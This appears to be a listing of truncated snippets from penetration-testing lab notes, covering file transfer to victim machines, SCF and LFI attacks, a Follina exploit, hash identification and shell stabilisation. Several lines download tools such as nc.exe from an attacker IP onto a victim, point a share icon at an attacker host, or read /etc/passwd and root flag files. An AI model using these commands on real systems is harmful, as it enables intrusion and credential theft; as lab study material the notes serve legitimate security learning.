Upload Netcat executable for Windows. From victim machine: curl http://10.10.16.4/nc.exe -o nc.exe Examples: [[StreamIO#^40a776]] Network File System through SMB First create with impacket the se...
iwr (Invoke-WebRequest) Transfer a file with the following command: PS> iwr -uri http://10.10.14.4/PsBypassCLM.exe -OutFile PsBypassCLM.exe Execute these commands to create wget.ps1 on victim m...
Identify the hash type If you want to know the type of a password’s hash you can run the following command on your machine: hashcat.exe -j -m hash.txt And it will throw the type: Hash-mode was not...
SCF Attack First we need to write a file inside the share with write permissions: (root㉿kali)-[/mnt/tempMount/Users/Public] └─# cat test.scf [Shell] Command=2 IconFile=\\10.10.14.4\...
Simple LFI If an input is accepted on a URL parameter we can try to access any system file and check whether or not it retrieves the file: http://10.11.1.35/section.php?page=/etc/passwd http://1...
Redirect traffic to TCP localhost port We can redirect the websocket traffic to a TCP localhost port so we can interact with it as if it were an HTTP port: from http.server import SimpleHTTPRequest...
Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP test tool. Features include: SMTP extensions including TLS, authentication, pipelining, PROXY, PRDR, and XCLIENT Protoco...
The following Follina exploit works pretty well; all you need to do is clone the repository and execute it as follows. The “-c” is the command to execute; it can be a cmd or a PowerShell instruction...
Python Once we get access to the victim machine we proceed to stabilize the shell: First we need to Ctrl + Z the shell as follows: tom@epsilon:/var/www/app$ ^Z zsh: suspended nc -lvnp 1235 Then t...
Read a file Create a file test.js with content: const fs = require('fs'); fs.readFile('/root/root.txt', 'utf-8', (err, data) =>{ if (err) throw err; console.log(data); }); To e...